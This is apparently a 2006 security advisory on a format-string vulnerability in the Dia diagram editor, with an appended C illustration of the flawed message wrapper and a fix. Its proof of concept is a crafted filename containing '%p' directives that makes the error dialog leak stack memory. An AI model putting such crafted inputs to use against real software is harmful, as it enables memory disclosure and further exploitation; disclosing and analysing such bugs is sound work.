DIA file name handling format string
king_purba@yahoo.co.uk
Date: Fri May 05 2006 - 23:51:14 CDT
Author : KaDaL-X
http://kandangjamur.net
Software tested
Dia v 0.94 on fedora Core 4
Dia v 0.94 on Mandriva
http://www.gnome.org/projects/dia
PoC :
------
[ph03n1x@kaiten ~]$ touch %p%p%p%p.bmp
Now, open %p%p%p%p.bmp using dia, then an error something like this will happen:
Failed to load:
Couldn't recognize the image file format for file
'0xbfec1a480xc0cf670x89608b00x9f247e.bmp'
Code analysis:
--------------
in plug-ins/pixbuf/pixbuf.c line 152

    else if (error) /* otherwise a pixbuf misbehaviour */
    {
        message_warning ("Failed to load:\n%s", error->message);
        g_error_free (error);
    }
then in lib/message.c line 220

    void
    message_warning(const char *format, ...)
    {
        va_list args, args2;
        va_start (args, format);
        va_start (args2, format);
        message_internal(_("Warning"), format, &args, &args2);
        va_end (args);
        va_end (args2);
    }
On lib/message.c line 187 message_internal has been defined as

    static MessageInternal message_internal = gtk_message_internal;
Now, analyzing the gtk_message_internal() function in lib/message.c on line 157,
the vsprintf() function was used incorrectly:

    vsprintf (buf, fmt, *args2);
The second argument of vsprintf must be a constant string, based on
/usr/include/stdio.h
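As an added illustration (not Dia's own code): the wrapper pattern described above, modelled in C with a stand-in dialog function. It assumes, as the analysis implies, that the text built by vsprintf() is afterwards consumed by a printf-style call; show_dialog, message_warning, wrappers_agree_on and fixed_message_for are constructed names, and the vulnerable path is only ever exercised with a filename that carries no '%'.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for a printf-style dialog API (an assumption; the page only shows the
 * vsprintf step). Whatever text it receives is interpreted as a FORMAT string. */
static void show_dialog(char *out, size_t outlen, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out, outlen, fmt, ap);
    va_end(ap);
}

/* The caller's arguments (here a filename) are formatted into buf. With
 * fixed == 0, buf itself becomes the format of the next call (the bug);
 * with fixed == 1, buf travels behind a constant "%s", so '%' stays data. */
void message_warning(int fixed, char *out, size_t outlen, const char *fmt, ...)
{
    char buf[256];
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(buf, sizeof buf, fmt, ap);
    va_end(ap);
    if (fixed)
        show_dialog(out, outlen, "%s", buf);
    else
        show_dialog(out, outlen, buf);  /* '%p' in the filename now acts as a directive */
}

/* 1 when both paths yield identical text for a filename without '%': this is
 * why routine use never reveals the bug. */
int wrappers_agree_on(const char *name)
{
    static char a[512], b[512];
    message_warning(0, a, sizeof a, "Failed to load:\n%s", name);
    message_warning(1, b, sizeof b, "Failed to load:\n%s", name);
    return strcmp(a, b) == 0;
}

/* Text the fixed path shows for a name; only this path may be given a name
 * containing directives (the other would read the stack, as the PoC shows). */
const char *fixed_message_for(const char *name)
{
    static char b[512];
    message_warning(1, b, sizeof b, "Failed to load:\n%s", name);
    return b;
}
```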